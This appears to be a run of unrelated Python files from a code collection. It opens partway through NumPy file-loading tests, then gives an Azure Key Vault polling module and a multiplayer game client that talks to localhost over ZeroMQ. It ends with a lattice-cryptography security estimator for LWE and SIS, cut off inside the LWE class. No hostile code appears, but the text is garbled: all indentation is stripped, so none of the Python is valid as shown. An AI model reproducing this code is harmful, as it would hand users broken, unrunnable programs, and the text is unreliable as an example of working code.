with temppath(suffix='.txt') as path:
path = Path(path)
a = np.array([(1, 2), (3, 4)])
np.savetxt(path, a)
data = np.genfromtxt(path)
assert_array_equal(a, data)
def test_ndfromtxt(self):
# Test outputting a standard ndarray
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.genfromtxt(path, dtype=int)
assert_array_equal(test, control)
def test_mafromtxt(self):
# From `test_fancy_dtype_alt` above
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'1,2,3.0\n4,5,6.0\n')
test = np.genfromtxt(path, delimiter=',', usemask=True)
control = ma.array([(1.0, 2.0, 3.0), (4.0, 5.0, 6.0)])
assert_equal(test, control)
def test_recfromtxt(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(path, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_recfromcsv(self):
with temppath(suffix='.txt') as path:
path = Path(path)
with path.open('w') as f:
f.write(u'A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(path, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', int), ('B', int)])
assert_(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
# These next two classes encode the minimal API needed to save()/load() arrays.
# The `test_ducktyping` ensures they work correctly
class JustWriter(object):
def __init__(self, base):
self.base = base
def write(self, s):
return self.base.write(s)
def flush(self):
return self.base.flush()
class JustReader(object):
def __init__(self, base):
self.base = base
def read(self, n):
return self.base.read(n)
def seek(self, off, whence=0):
return self.base.seek(off, whence)
def test_ducktyping():
a = np.random.random((5, 5))
s = BytesIO()
f = JustWriter(s)
np.save(f, a)
f.flush()
s.seek(0)
f = JustReader(s)
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
# Thanks to another windows brokenness, we can't use
# NamedTemporaryFile: a file created from this function cannot be
# reopened by another open call. So we first put the gzipped string
# of the test reference array, write it to a securely opened file,
# which is then read from by the loadtxt function
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
with temppath(suffix='.gz') as name:
with open(name, 'wb') as f:
f.write(s.read())
res = np.loadtxt(name)
s.close()
assert_array_equal(res, [1, 2, 3])
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
@pytest.mark.skipif(not HAS_REFCOUNT, reason="Python lacks refcounts")
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
with assert_no_gc_cycles():
np.load(f)
f.seek(0)
dt = [("a", 'u1', 2), ("b", 'u1', 2)]
with assert_no_gc_cycles():
x = np.loadtxt(TextIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([((0, 1), (2, 3))], dtype=dt))
|
_polling.py | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import logging
import time
import threading
import uuid
from typing import TYPE_CHECKING
from azure.core.polling import PollingMethod, LROPoller, NoPolling
from azure.core.exceptions import ResourceNotFoundError, HttpResponseError
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
# pylint: disable=ungrouped-imports
from typing import Any, Callable, Union, List, Optional
logger = logging.getLogger(__name__)
class KeyVaultOperationPoller(LROPoller):
"""Poller for long running operations where calling result() doesn't wait for operation to complete.
"""
# pylint: disable=arguments-differ
def __init__(self, polling_method):
# type: (PollingMethod) -> None
super(KeyVaultOperationPoller, self).__init__(None, None, lambda *_: None, NoPolling())
self._polling_method = polling_method
# pylint: disable=arguments-differ
def result(self): # type: ignore
# type: () -> Any
"""Returns a representation of the final resource without waiting for the operation to complete.
:returns: The deserialized resource of the long running operation
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
return self._polling_method.resource()
@distributed_trace
def wait(self, timeout=None):
# type: (Optional[float]) -> None
"""Wait on the long running operation for a number of seconds.
You can check if this call has ended with timeout with the "done()" method.
:param float timeout: Period of time to wait for the long running
operation to complete (in seconds).
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
if not self._polling_method.finished():
self._done = threading.Event()
self._thread = threading.Thread(
target=with_current_context(self._start), name="KeyVaultOperationPoller({})".format(uuid.uuid4())
)
self._thread.daemon = True
self._thread.start()
if self._thread is None:
return
self._thread.join(timeout=timeout)
try:
# Let's handle possible None in forgiveness here
raise self._exception # type: ignore
except TypeError: # Was None
pass
class DeleteRecoverPollingMethod(PollingMethod):
"""Poller for deleting resources, and recovering deleted resources, in vaults with soft-delete enabled.
This works by polling for the existence of the deleted or recovered resource. When a resource is deleted, Key Vault
immediately removes it from its collection. However, the resource will not immediately appear in the deleted
collection. Key Vault will therefore respond 404 to GET requests for the deleted resource; when it responds 2xx,
the resource exists in the deleted collection i.e. its deletion is complete.
Similarly, while recovering a deleted resource, Key Vault will respond 404 to GET requests for the non-deleted
resource; when it responds 2xx, the resource exists in the non-deleted collection, i.e. its recovery is complete.
"""
def __init__(self, command, final_resource, finished, interval=2):
self._command = command
self._resource = final_resource
self._polling_interval = interval
self._finished = finished
def _update_status(self):
# type: () -> None
try:
self._command()
self._finished = True
except ResourceNotFoundError:
pass
except HttpResponseError as e:
# If we are polling on get_deleted_* and we don't have get permissions, we will get
# ResourceNotFoundError until the resource is recovered, at which point we'll get a 403.
if e.status_code == 403:
self._finished = True
else:
raise
def initialize(self, client, initial_response, deserialization_callback):
pass
def run(self):
# type: () -> None
try:
while not self.finished():
self._update_status()
if not self.finished():
time.sleep(self._polling_interval)
except Exception as e:
logger.warning(str(e))
raise
def finished(self):
# type: () -> bool
return self._finished
def resource(self):
# type: () -> Any
return self._resource
def status(self):
# type: () -> str
return "finished" if self._finished else "polling"
|
client02c.py | import copy
import logging
import asyncio
import threading
import time
from collections import deque
from typing import Dict
import zmq
from zmq.asyncio import Context, Socket
import arcade
from pymunk.vec2d import Vec2d
from demos.movement import KeysPressed, MOVE_MAP, apply_movement
from .lib02 import PlayerEvent, PlayerState, GameState
logger = logging.getLogger(__name__)
logger.setLevel('INFO')
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
RECT_WIDTH = 50
RECT_HEIGHT = 50
MOVEMENT_SPEED = 5
UPDATE_TICK = 30
class Rectangle:
def __init__(self, x, y, width, height, angle, color):
self.position = Vec2d(x, y)
self.movement: Dict[Vec2d] = {}
# Size and rotation
self.width = width
self.height = height
self.angle = angle
# Color
self.color = color
self.filled = True
def draw(self):
if self.filled:
arcade.draw_rectangle_filled(
self.position.x, self.position.y,
self.width, self.height,
self.color, self.angle
)
else:
arcade.draw_rectangle_outline(
self.position.x, self.position.y,
self.width, self.height,
self.color, border_width=4,
tilt_angle=self.angle
)
class MyGame(arcade.Window):
def __init__(self, width, height):
super().__init__(width, height, title="Multiplayer Demo")
self.keys_pressed = KeysPressed()
arcade.set_background_color(arcade.color.GRAY)
self.player = Rectangle(
0, 0, RECT_WIDTH, RECT_HEIGHT, 0, arcade.color.GREEN_YELLOW)
self.player_position_snapshot = copy.copy(self.player.position)
self.player.filled = False
self.ghost = Rectangle(
0, 0, RECT_WIDTH, RECT_HEIGHT, 0, arcade.color.BLACK)
self.player_event = PlayerEvent()
self.game_state = GameState(
player_states=[
PlayerState()
],
game_seconds=0
)
self.position_buffer = deque(maxlen=3)
self.t = 0
def setup(self):
x = SCREEN_WIDTH // 2
y = SCREEN_HEIGHT // 2
self.player.position += Vec2d(x, y)
self.ghost.position += Vec2d(x, y)
def lerp(self, v0: float, v1: float, t: float):
""" L-inear int-ERP-olation"""
return (1 - t) * v0 + t * v1
def update(self, dt):
# Now calculate the new position based on the server information
if len(self.position_buffer) < 2:
return
# These are the last two positions. p1 is the latest, p0 is the
# one immediately preceding it.
p0, t0 = self.position_buffer[0]
p1, t1 = self.position_buffer[1]
dtt = t1 - t0
if dtt == 0:
return
# Calculate a PREDICTED future position, based on these two.
velocity = (p1 - p0) / dtt
# predicted position
predicted_position = velocity * dtt + p1
x = (self.t - 0) / dtt
x = min(x, 1)
interp_position = self.lerp(
self.player_position_snapshot, predicted_position, x
)
self.player.position = interp_position
# self.player.position = p1
self.ghost.position = p1
self.t += dt
def on_draw(self):
arcade.start_render()
self.ghost.draw()
self.player.draw()
def on_key_press(self, key, modifiers):
# self.player.movement[key] = MOVE_MAP[key] * MOVEMENT_SPEED
logger.debug(key)
self.player_event.keys[key] = True
self.keys_pressed.keys[key] = True
def on_key_release(self, key, modifiers):
# del self.player.movement[key]
self.player_event.keys[key] = False
self.keys_pressed.keys[key] = False
async def thread_main(window: MyGame, loop):
ctx = Context()
sub_sock: Socket = ctx.socket(zmq.SUB)
sub_sock.connect('tcp://localhost:25000')
sub_sock.subscribe('')
push_sock: Socket = ctx.socket(zmq.PUSH)
push_sock.connect('tcp://localhost:25001')
async def pusher():
"""Push the player's INPUT state 60 times per second"""
while True:
d = window.player_event.asdict()
msg = dict(counter=1, event=d)
await push_sock.send_json(msg)
await asyncio.sleep(1 / UPDATE_TICK)
async def receive_game_state():
while True:
gs_string = await sub_sock.recv_string()
# logger.debug('.', end='', flush=True)
window.game_state.from_json(gs_string)
ps = window.game_state.player_states[0]
t = time.time()
window.position_buffer.append(
(Vec2d(ps.x, ps.y), t)
)
window.t = 0
window.player_position_snapshot = copy.copy(window.player.position)
try:
await asyncio.gather(pusher(), receive_game_state())
finally:
sub_sock.close(1)
push_sock.close(1)
ctx.destroy(linger=1)
def thread_worker(window: MyGame):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.create_task(thread_main(window, loop))
loop.run_forever()
def main():
window = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT)
window.setup()
thread = threading.Thread(
target=thread_worker, args=(window,), daemon=True)
thread.start()
arcade.run()
if __name__ == "__main__":
main()
|
problem.py | r"""
Module containing problem classes for SIS and LWE and their ring and module variants, as well as statistically secure variants, where applicable. In addition, the module contains estimate functions to estimate the security of parameter problems and estimate result classes to encapsulate return values for cost estimates.
"""
from . import distributions
from . import algorithms
from . import norm
from abc import ABC, abstractmethod
from typing import Iterable, List
import time
import os
import logging
import traceback
import multiprocessing as mp
from queue import Empty
from functools import partial
import json
import sage.all
from sage.functions.log import log
from sage.functions.other import sqrt
from sage.rings.all import RR
from sage.symbolic.all import pi, e
from sage.misc.functional import round
import estimator as est
oo = est.PlusInfinity()
## Logging ##
logger = logging.getLogger(__name__)
# info about running algorithms and results
alg_logger = logging.getLogger(logger.name + ".estimation_logging")
# exceptions from estimator
alg_exception_logger = logging.getLogger(logger.name + ".estimation_exception_logging")
## Configuration ##
ERROR_HANDLING_ON = True # if True try to deal with errors and not raise exceptions
REDUCE_PROBLEMS = True
## Helper Classes ##
class EmptyProblem(Exception):
pass
class AllFailedError(Exception):
pass
class BaseProblem:
pass
## Helper class
class AlgorithmResult:
"""
Encapsulates algorithm estimates.
"""
def __init__(
self,
runtime,
problem_instance,
params,
alg_name,
c_name="",
cost=est.Cost([("rop", oo)]),
is_successful=True,
error=None,
is_insecure=False,
):
"""
:param runtime: runtime [s]
:param problem_instance: label of problem instance
:param params: list of input parameters for algorithm
:param alg_name: name of algorithm
:param c_name: name of cost model
:param cost: cost dict (:py:mod:`lattice_parameter_estimation.estimator.estimator.Cost` from LWE Estimator)
:param is_successful: ``True`` if algorithm was successful
:param error: string with error description
:param is_insecure: must be ``True`` if found cost estimate violates security requirement
"""
self.runtime = runtime
self.problem_instance = problem_instance
self.params = params
self.alg_name = alg_name
self.c_name = c_name
self.cost = cost
self.is_successful = is_successful
self.error = error
self.is_insecure = is_insecure
def to_dict(self):
"""
:returns: JSON-serializable dict
"""
params = {}
for key, value in self.params.items():
try:
params[key] = float(value)
except:
params[key] = value
return {
"inst": self.problem_instance,
"alg_name": self.alg_name,
"cost_model": self.c_name,
"params": params,
"sec": max(0, float(log(abs(self.cost["rop"]), 2).n())),
"cost": str(self.cost),
"runtime": self.runtime,
"is_successful": self.is_successful,
"is_insecure": self.is_insecure,
"error": self.error,
}
def __bool__(self):
return self.is_secure
def __str__(self) -> str:
ret = self.str_no_err()
if self.error is not None:
ret += f"\nError: {self.error}"
return ret
def str_no_err(self) -> str:
"""
:returns: string without error message.
"""
if not self.is_successful:
detail = f"insuccessful (took {str(self.runtime)}s) \n\tparams: {str(self.params)}"
else:
sec = max(0, float(log(abs(self.cost["rop"]), 2).n()))
detail = f'{["secure", "insecure"][self.is_insecure]} (took {self.runtime:.1f}s): \n\tsec: {str(sec)}\n\tparams: {str(self.params)}'
return (
f'\n\tEstimate for "{self.alg_name}"{["", " " + self.c_name][self.c_name != ""]} - {self.problem_instance} '
+ detail
)
class AggregateEstimationResult:
"""
Encapsulates aggregation of estimate results and automates ``is_secure``-check according to specified security strategy in ``config``.
"""
def __init__(
self,
config: algorithms.Configuration,
error="all_failed",
runtime=0,
problem_instances: List[BaseProblem] = [],
):
"""
:param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
:param error: set to ``"all_failed"`` if no algorithm passes, can also be ``"timeout"`` and ``"early_termination"``
:param runtime: list of runtime of algorithms run during estimation
:param problem_instances: pre-defined list of all problem instances (e.g. instance of :class:`MLWE`) for which estimates are run (used to check if result is secure, if not specified the list is dynamically created when results are added)
:ivar error: error message
:ivar is_insecure: ``True`` if aggregate result is insecure
:ivar lowest_sec: lowest found security estimate
:ivar runtime: total runtime
"""
self.error = error
self.is_insecure = False
self.lowest_sec = oo
self.alg_res_dict = {}
for inst in problem_instances:
self.alg_res_dict[inst] = []
self.runtime = runtime
self.config = config
self._contains_res = False
def add_algorithm_result(self, algorithm_result: AlgorithmResult):
"""
Adds algorithm result and automatically updates ``is_insecure``, ``error``, and ``cost`` instance variables.
:param algorithm_result: instance of :class:`AlgorithmResult`
"""
self._contains_res = True
if algorithm_result.is_insecure:
self.is_insecure = True
self.error = algorithm_result.error # "early_termination" or "timeout"
if algorithm_result.is_successful:
self.error = None
if algorithm_result.cost is not None:
new_sec = max(
0, log(abs(algorithm_result.cost["rop"]), 2).n()
) # make sure this does not raise an exception
if new_sec <= self.lowest_sec:
self.lowest_sec = new_sec
if not algorithm_result.problem_instance in self.alg_res_dict:
self.alg_res_dict[algorithm_result.problem_instance] = []
self.alg_res_dict[algorithm_result.problem_instance].append(algorithm_result)
def add_aggragate_result(self, aggregate_result):
"""
Adds aggregate result and automatically updates ``is_insecure``, ``error``, and ``cost`` instance variables.
:param algorithm_result: instance of :class:`AggregateEstimationResult`
"""
if not aggregate_result.is_secure():
self.is_insecure = True
if (
aggregate_result.error != "all_failed"
): # => error is "early_termination" or "timeout"
self.error = aggregate_result.error
if aggregate_result.lowest_sec < self.lowest_sec:
self.lowest_sec = aggregate_result.lowest_sec
for inst in aggregate_result.alg_res_dict:
if not inst in self.alg_res_dict:
self.alg_res_dict[inst] = []
self.alg_res_dict[inst].extend(aggregate_result.alg_res_dict[inst])
def get_algorithm_result_dict(
self, sort_by_rop=False, only_best_per_algorithm=False, only_successful=False
):
"""
Returns dict of that for each problem instance contains a list of estimation results corresponding to an algorithm and (not in all cases) a cost model.
:param sort_by_rop: if ``True`` list is sorted in ascending order by rop
:param only_best_per_algorithm: if ``True`` only the best algorithm for each cost model is returned
:param only_successful: only return estimate results for successful algorithms
"""
if not self._contains_res:
return self.alg_res_dict
result_dict = {}
for inst in self.alg_res_dict:
result_dict[inst] = self.alg_res_dict[inst]
if only_successful:
result_dict[inst] = [x for x in result_dict[inst] if x.is_successful]
if only_best_per_algorithm:
alg_names = set()
for alg_res in result_dict[inst]:
alg_names.add(alg_res.alg_name)
best_results = {}
for alg_name in alg_names:
best_results[alg_name] = min(
[x for x in result_dict[inst] if x.alg_name == alg_name],
key=lambda x: x.cost["rop"],
)
result_dict[inst] = list(best_results.values())
if sort_by_rop:
result_dict[inst] = sorted(
result_dict[inst], key=lambda x: x.cost["rop"]
)
return result_dict
def is_secure(self):
"""
Returns ``True`` if secure according to security strategy in config
"""
if self.is_insecure:
return False
for inst in self.alg_res_dict:
if not self.alg_res_dict[inst]:
return False
if self.config.security_strategy == algorithms.ALL_SECURE:
# TODO: x.is_insecure should not be necessary
if not all([x.is_successful for x in self.alg_res_dict[inst]]):
return False
elif self.config.security_strategy == algorithms.SOME_SECURE:
if not any([x.is_successful for x in self.alg_res_dict[inst]]):
return False
elif not self.config.security_strategy == algorithms.NOT_INSECURE:
raise ValueError("Security strategy in config improperly configured.")
return True
def to_dict(
self, sort_by_rop=False, only_best_per_algorithm=False, only_successful=False
):
"""
Returns results in JSON-serializable dict.
:param sort_by_rop: if ``True`` list is sorted in ascending order by rop
:param only_best_per_algorithm: if ``True`` only the best algorithm for each cost model is returned
:param only_successful: only return estimate results for successful algorithms
"""
alg_result_dict = {}
former_dict = self.get_algorithm_result_dict(
sort_by_rop=sort_by_rop,
only_best_per_algorithm=only_best_per_algorithm,
only_successful=only_successful,
)
for inst in former_dict:
alg_result_dict[inst] = [x.to_dict() for x in former_dict[inst]]
res = {
"alg_results": alg_result_dict,
"error": self.error,
"is_insecure": self.is_insecure,
"lowest_sec": max(0, float(self.lowest_sec)),
"runtime": self.runtime,
}
return res
def save_as_JSON(
self,
filename,
sort_by_rop=False,
only_best_per_algorithm=False,
only_successful=False,
):
"""
Save results in file.
:param filename: filename
:param sort_by_rop: if ``True`` list is sorted in ascending order by rop
:param only_best_per_algorithm: if ``True`` only the best algorithm for each cost model is returned
:param only_successful: only return estimate results for successful algorithms
"""
with open(filename + ".json", "w") as fout:
json.dump(
self.to_dict(
sort_by_rop=sort_by_rop,
only_best_per_algorithm=only_best_per_algorithm,
only_successful=only_successful,
),
fout,
indent=4,
)
def __bool__(self):
"""
Calls :meth:`is_secure`.
"""
return self.is_secure()
def __str__(self) -> str:
error = ", Error: " + self.error if self.error is not None else ""
return (
f'Estimates successful and {["insecure", "secure"][self.is_secure()]}'
+ f" (took {self.runtime:.1f}s):"
+ f" best sec={str(self.lowest_sec)}"
+ error
)
class BaseProblem(ABC):
@abstractmethod
def __init__(self):
pass
@abstractmethod
def get_estimate_algorithms(self, config=None):
pass
# TODO: check, perhaps add other operators
def __ge__(self, sec) -> AggregateEstimationResult:
config = algorithms.Configuration() # use default config
return estimate(parameter_problem=[self], config=config, sec=sec)
def __gt__(self, sec) -> AggregateEstimationResult:
config = algorithms.Configuration() # use default config
return estimate(parameter_problem=[self], config=config, sec=sec + 1)
def __lt__(self, sec) -> AggregateEstimationResult:
return not self.__ge__(sec)
def __le__(self, sec) -> AggregateEstimationResult:
return not self.__gt__(sec)
@abstractmethod
def __str__(self):
pass
def reduce_parameter_problems(
parameter_problems: Iterable[BaseProblem], config: algorithms.Configuration
) -> List[BaseProblem]:
"""
Reduce iterable of parameter problems to easiest versions of SIS and LWE respectively according to the following hardness rules:
For LWE, we have that the larger ``n`` and ``alpha`` are and the smaller ``q`` and ``m`` are, the harder the problem becomes. For SIS, the problem becomes harder for increasing ``n`` and ``q`` and decreasing ``beta`` and ``m``.
Two problem instances might not be comparable with the above rules, hence the reduction is incomplete.
:param parameter_problems: iterable over instances of :class:`BaseProblem`
"""
if not isinstance(config, algorithms.Configuration):
raise ValueError("config must be instance of algorithms.Configuration")
parameter_problems = list(parameter_problems)
if not REDUCE_PROBLEMS:
return parameter_problems
lwe_problems = [
prob.to_LWE() for prob in parameter_problems if isinstance(prob, LWE)
]
sis_problems = [
prob.to_SIS() for prob in parameter_problems if isinstance(prob, SIS)
]
def _easier_lwe(a: LWE, b: LWE) -> bool:
if (
a.n <= b.n
and a.q >= b.q
and a.error_distribution.get_alpha(q=a.q, n=a.n)
<= b.error_distribution.get_alpha(q=b.q, n=b.n)
and a.m >= b.m
):
return True
return (
False # does not mean that it is harder, maybe instances cannot be compared
)
def _easier_sis(a: SIS, b: SIS) -> bool:
# compare norms needed for algorithms
test_L2 = algorithms.REDUCTION or algorithms.REDUCTION_RS in config.algorithms
test_Loo = algorithms.COMBINATORIAL in config.algorithms
if test_L2:
is_larger_bound = a.bound.to_L2(a.n).value >= b.bound.to_L2(b.n).value
if test_Loo:
is_larger_bound_Loo = a.bound.to_Loo(a.n).value >= b.bound.to_Loo(b.n).value
if test_L2:
is_larger_bound = is_larger_bound and is_larger_bound_Loo
else:
is_larger_bound = is_larger_bound_Loo
if a.n <= b.n and a.q <= b.q and is_larger_bound and a.m >= b.m:
return True
return (
False # does not mean that it is harder, maybe instances cannot be compared
)
lwe_set = set()
for prob in lwe_problems:
# determine easiest problem relative to prob (there may be different problems that can't be compared)
easiest_prob = prob
for cmp_prob in lwe_problems:
if _easier_lwe(cmp_prob, easiest_prob):
easiest_prob = cmp_prob
lwe_set.add(easiest_prob)
sis_set = set()
for prob in sis_problems:
# determine easiest problem relative to prob (there may be different problems that can't be compared)
easiest_prob = prob
for cmp_prob in sis_problems:
if _easier_sis(cmp_prob, easiest_prob):
easiest_prob = cmp_prob
sis_set.add(easiest_prob)
return list(lwe_set | sis_set)
## Estmation ##
def algorithms_executor(
algs, config: algorithms.Configuration, sec=None, res_queue=None
):
"""Executes list of estimate algorithms in ``algs``. Results are written in ``res_queue`` as instances of :class:`AlgorithmResult` if set (in parallel execution).
:param algs: list of tuples as ``[(problem_instance, alg)]``, where alg is dict as ``{"algname": "a1", "cname": "c1", "algf": f, "prio": 0, "cprio": 0, "inst": "LWE"}`` (item in list returned from :meth:`BaseProblem.get_estimate_algorithms`)
:param sec: bit security parameter
:param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
:param res_queue: for multiprocessing support, instance of :py:mod:`multiprocessing.Queue`
:returns: ``None`` if res_queue is set, else an instance of :class:`AggregateEstimationResult`
"""
if not isinstance(config, algorithms.Configuration):
raise ValueError("config must be instance of algorithms.Configuration")
start = time.time()
results = AggregateEstimationResult(config=config)
results = []
early_termination = False
timeout = False
for alg_tuple in algs:
# for not parallel TODO
if (
time.time() - start > config.timeout
): # won't prevent algorithm from looping infinitively
timeout = True
break
# alg_tuple is tuple (problem_instance, alg)
inst = alg_tuple[0]
alg = alg_tuple[1]
algf = alg["algf"]
def conversion(k, v):
if k in ["alpha"]:
return k, float(v)
else:
return k, v
params = dict(
[
conversion(k, algf.keywords[k])
for k in ["secret_distribution", "n", "m", "q", "alpha", "bound"]
if k in set(algf.keywords)
]
)
cname = f'({alg["cname"]})' if alg["cname"] != "" else ""
alg_logger.info(
str(os.getpid())
+ f' Running algorithm {alg["algname"]} {cname}... Parameters: {str(params)}'
)
start_alg = time.time()
cost = est.Cost([("rop", oo)]) # else finding best doesn't work
error = None
# TODO: could be encapsulated in AlgorithmResult
is_insecure = False
is_successful = False
try:
cost = algf()
if cost == None:
cost = est.Cost([("rop", oo)])
raise RuntimeError(
"Bug in estimator (returned None). No solution found."
)
if sec and cost["rop"] < 2 ** sec:
is_insecure = True
is_successful = True
except algorithms.IntractableSolution:
# from SIS algorithms
cost = est.Cost([("rop", oo)])
is_successful = True
if sec and cost["rop"] < 2 ** sec:
is_insecure = True
error = "intractable"
except algorithms.TrivialSolution:
# from SIS algorithms
cost = est.Cost([("rop", RR(1))])
if sec and sec > 0:
is_insecure = True
is_successful = True
error = "trivial"
except:
# something went wrong
error = traceback.format_exc()
runtime = time.time() - start_alg
alg_res = AlgorithmResult(
runtime=runtime,
problem_instance=inst,
params=params,
alg_name=alg["algname"],
c_name=alg["cname"],
cost=cost,
is_successful=is_successful,
error=error,
is_insecure=is_insecure,
)
if not is_successful:
alg_logger.error(str(alg_res))
else:
alg_logger.info(str(alg_res))
if res_queue is None:
results.append(alg_res)
else:
res_queue.put(alg_res)
if is_insecure or (
config.security_strategy == algorithms.ALL_SECURE and is_successful == False
):
# early termination
break
if res_queue is None:
# no multiprocessing
total_runtime = time.time() - start
agg_result = AggregateEstimationResult(config=config)
agg_result.runtime = total_runtime
for alg_res in results:
agg_result.add_algorithm_result(alg_res)
if early_termination: # if all_failed no early termination
agg_result.error = "early_termination"
if timeout:
agg_result.error = "timeout"
return agg_result
return True # TODO try without
def estimate(
parameter_problems: Iterable[BaseProblem],
config: algorithms.Configuration,
sec=None,
) -> AggregateEstimationResult:
"""
Runs estiamtes for problem instances in ``parameter_problems``.
First, the list of problem instances is reduced to the simplest version of LWE and SIS respectively. Then, a list algorithm instances are created and executed sequentially or concurrently by :meth:`algorithms_executor` according to the configuration in ``config``.
Estimate logging can be configured in in :py:mod:`lattice_parameter_estimation.Logging`.
:param parameter_problems: iterable over instances of :class:`BaseProblem`. If empty or no algorithms can be created :class:`EmptyProblem` is raised.
:param config: instance of :py:mod:`lattice_parameter_estimation.algorithms.Configuration`
:param sec: optional bit security parameter. If set, early termination is supported once insecure estimate is found.
:returns: instance of :class:`AggregateEstimationResult`
"""
if not isinstance(config, algorithms.Configuration):
raise ValueError("config must be instance of algorithms.Configuration")
# Create algorithm list of tuples (problem_instance, alg)
algs = []
parameter_problems = reduce_parameter_problems(parameter_problems, config)
for problem_instance in parameter_problems:
try:
inst_algs = problem_instance.get_estimate_algorithms(config=config)
except NotImplementedError as e:
if ERROR_HANDLING_ON: # TODO
logger.error(e)
else:
raise e
if not inst_algs:
raise EmptyProblem(
f"No algorithm for instance {str(problem_instance)}. Perhaps algorithm in Configuration was not set properly."
)
for alg in inst_algs:
algs.append(
(problem_instance.label, alg)
) # TODO maybe find better description for inst or change __str__
if not algs: # no instance
raise EmptyProblem("Could not find any algorithms for given input parameters.")
# sort first by algorithm priority, then by cost model priority
algs = sorted(algs, key=lambda a: (a[1]["prio"], a[1]["cprio"]))
start = time.time()
if not config.parallel:
num_procs = 1 # needed to terminate infinite loops
elif config.num_cpus is None:
num_procs = min(mp.cpu_count(), len(algs))
else:
num_procs = config.num_cpus
# evenly distribute algorithms according to sorting among #NUM_CPUS lists
split_list = num_procs * [None]
for j in range(num_procs):
split_list[j] = []
for i in range(len(algs)):
split_list[i % num_procs].append(algs[i])
alg_logger.debug(f"Starting {num_procs} processes for {len(algs)} algorithms...")
alg_logger.debug(
"Running estimates " + ["without", "with"][bool(sec)] + " early termination..."
) # TODO
p = [None] * len(split_list)
results = AggregateEstimationResult(
config=config, problem_instances=[x.label for x in parameter_problems]
)
result_queue = mp.Queue()
async_res = []
for i in range(len(split_list)):
# TODO NEW VERSION - not working
# pool = mp.Pool(processes=len(split_list)) # TODO outsource in global var
# async_res.append(
# pool.apply_async(
# func=algorithms_executor,
# args=(split_list[i], config, sec, result_queue)
# )
# )
# map_async could also work
# TODO OLD VERSION
p[i] = mp.Process(
target=algorithms_executor, args=(split_list[i], config, sec, result_queue)
)
p[i].start()
alg_logger.debug(str(p[i].pid) + " started...")
terminated = False
while not terminated:
try:
# Check if all processes finished their calculation
# TODO OLD VERSION
all_done = True
for i in range(len(split_list)):
if p[i].is_alive():
all_done = False
break
if all_done:
terminated = True
for i in range(len(split_list)):
p[i].join()
result_queue.close()
terminated = True
break
# Try to get result
alg_res = result_queue.get(
block=True, timeout=0.5
) # timeout necessary as process that wrote result in queue may still be alive in the above check
results.add_algorithm_result(alg_res)
if (
sec and results.is_insecure
): # is_secure may not be right as tests not complete
alg_logger.debug(
"Received insecure result. Terminate all other processes."
)
# insecure result obtained => terminate all other processes
results.error = "early_termination"
for i in range(len(split_list)):
p[i].terminate()
p[i].join()
# data put into queue during terminate may become corrupted => just close it
result_queue.close()
terminated = True
except Empty: # result not yet available
if time.time() - start > config.timeout:
# Computation too long, result not expected anymore
for i in range(len(split_list)):
p[i].terminate()
p[i].join()
result_queue.close()
terminated = True
if sec and results.is_secure():
if config.security_strategy == algorithms.ALL_SECURE:
# since at least one is not successful => All_SECURE = FALSE
results.is_insecure = True
results.error = "timeout"
message = f"Timeout during estimation after {config.timeout}s. Try to specify longer timeout in config. If no result is obtained, one of the algorithms might not terminate for the given parameter set."
if not results.is_secure():
raise TimeoutError(message)
if results.error == "all_failed": # TODO: don't raise exception
raise AllFailedError("All estimate algorithms failed")
runtime = time.time() - start
results.runtime = runtime
alg_logger.info(str(results))
return results
## LWE and its variants ##
class LWE(BaseProblem):
"""
Learning with Errors (LWE) problem class used to create a list of algorithms from the LWE Estimator :cite:`APS15` for cost estimation.
"""
_counter = 1
def __init__(
self,
n,
q,
m,
secret_distribution: distributions.Distribution,
error_distribution: distributions.Distribution,
variant="LWE",
label=None,
):
"""
:param q: modulus
:param n: secret dimension
:param m: number of samples
